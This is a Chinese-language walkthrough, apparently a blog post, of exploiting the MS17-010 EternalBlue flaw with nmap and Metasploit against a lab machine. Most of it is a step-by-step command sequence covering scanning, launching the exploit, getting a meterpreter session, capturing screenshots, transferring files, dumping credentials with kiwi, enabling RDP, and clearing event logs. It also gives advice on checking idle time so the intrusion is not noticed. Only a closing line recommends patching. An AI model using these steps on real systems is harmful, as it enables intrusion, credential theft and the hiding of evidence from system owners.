提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议。
用nmap的漏洞扫描模式
nmap --script=vuln 192.168.178.128
可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。
打开metasploit(msf很有意思的是,每次打开都会显示不同的画面。)
msfconsole
搜索ms17-010相关模块,可以看到一共找到了6个不同的模块。(选项:0-5)
search ms17-010
加载扫描模块。(选项1)
use auxiliary/scanner/smb/smb_ms17_010
查看配置选项
show options
RHOSTS显示远程主机未配置,配置目标主机。
set rhosts 192.168.178.128
开始扫描漏洞,再次证实靶机存在MS17-010漏洞。
exploit
使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷:
set payload
查看选项并设置rhosts:
set rhosts 192.168.178.128
输入exploit开始攻击。
运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
演示几个功能
meterpreter > screenshot
meterpreter > upload hello.txt c://
meterpreter > download d://1.txt
meterpreter > run vnc
启动失败了- -好像是靶机没有启动vnc服务。
meterpreter > shell
meterpreter > load kiwi
Loading extension kiwi...Success.
Kiwi在32位系统中能够正常使用,到了64位系统中需要用到进程迁移
进程迁移请参考:http://hackdig.com/09/hack-144260.htm
完成进程迁移后:
meterpreter > creds_all
meterpreter > run post/windows/manage/enable_rdp
使用时一般配合查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。登录rdp会把对方顶掉。
meterpreter > idletime
使用 rdesktop 命令远程连接桌面
root@kali:~# rdesktop 192.168.2.6
用上一步获取的账户密码进行登录,登录成功。
meterpreter > clearev
清除日志前,靶机的事件查看器是这样的。(记录了大量的事件)
被清空了~
还有很多功能选项,可以自己去查一下,就不全部罗列出来了。
受影响的系统版本可以参照:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。